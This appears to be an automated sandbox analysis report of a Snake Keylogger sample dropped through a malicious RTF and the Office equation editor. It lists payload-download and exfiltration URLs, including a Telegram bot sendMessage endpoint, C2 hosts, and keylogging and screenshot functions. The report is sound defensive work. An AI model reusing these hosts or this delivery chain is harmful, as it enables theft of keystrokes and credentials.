Source: global traffic HTTP traffic detected: GET /txt/H363BpKqz0MdVd7.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.123Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 27 Sep 2024 14:01:09 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: millitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: txt on 66.63.187.123.url.0.dr String found in binary or memory: http://66.63.187.123/txt/
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000009.00000003.422853483.000000000068B000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.422892150.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.423390296.000000000065F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.423390296.000000000068C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://66.63.187.123/txt/H363BpKqz0MdVd7.exe
Source: EQNEDT32.EXE, 00000009.00000003.422853483.000000000068B000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.423390296.000000000068C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://66.63.187.123/txt/H363BpKqz0MdVd7.exeC:
Source: EQNEDT32.EXE, 00000009.00000002.423390296.000000000065F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://66.63.187.123/txt/H363BpKqz0MdVd7.exej
Source: EQNEDT32.EXE, 00000009.00000002.423390296.000000000065F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://66.63.187.123/txt/H363BpKqz0MdVd7.exettC:
Source: millizxc.doc.url.0.dr String found in binary or memory: http://66.63.187.123/txt/millizxc.doc
Source: millitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: millitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000256A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000255C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024F5000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002505000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002454000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000253C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002512000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000254E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.com
Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000255C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002493000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024F5000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002505000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002454000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002442000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000253C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002520000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002512000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000254E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: millitingacy20306.exe, 0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: millitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: millitingacy20306.exe, 0000000D.00000002.952374182.00000000058C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: millitingacy20306.exe, 0000000D.00000002.952374182.00000000058C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000255C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024F5000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002505000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000246D000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000253C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002512000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000254E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://reallyfreegeoip.org
Source: millitingacy20306.exe, 0000000A.00000002.436028498.0000000002200000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: millitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000256A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: millitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000256A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000256A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000256A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20a
Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000255C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002493000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024F5000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002505000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002454000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000253C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002512000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000254E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: millitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002454000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000254E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000255C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002493000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024F5000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002505000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000253C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002512000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000254E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.334
Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/favicon.ico
Source: millitingacy20306.exe, 0000000D.00000002.951853308.0000000003512000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=net
Source: millitingacy20306.exe, 0000000D.00000002.951853308.0000000003512000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
Source: millitingacy20306.exe, 0000000D.00000002.951853308.0000000003512000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=wmf
Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003527000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003502000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.00000000034CD000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003581000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.00000000035DB000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.00000000035B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/sorry/index
Source: millitingacy20306.exe, 0000000D.00000002.951853308.0000000003512000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
Source: millitingacy20306.exe, 0000000D.00000002.951853308.0000000003512000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
Source: millitingacy20306.exe, 0000000D.00000002.951853308.000000000356C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.00000000034DA000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.00000000034B8000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000358E000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.00000000035C6000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003512000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/sorry/indextest
Source: unknown Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49177 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49179 -> 443
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49184 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to capture screen (.Net source)
Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
Source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
Contains functionality to log keystrokes (.Net Source)
Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode
Source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: millitingacy20306.exe PID: 3832, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: millitingacy20306.exe PID: 3952, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\millizxc[1].doc, type: DROPPED Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\193318D4.doc, type: DROPPED Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Microsoft Office drops suspicious files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\millizxc.doc.url Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\txt on 66.63.187.123.url Jump to behavior
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\millitingacy20306.exe Jump to dropped file
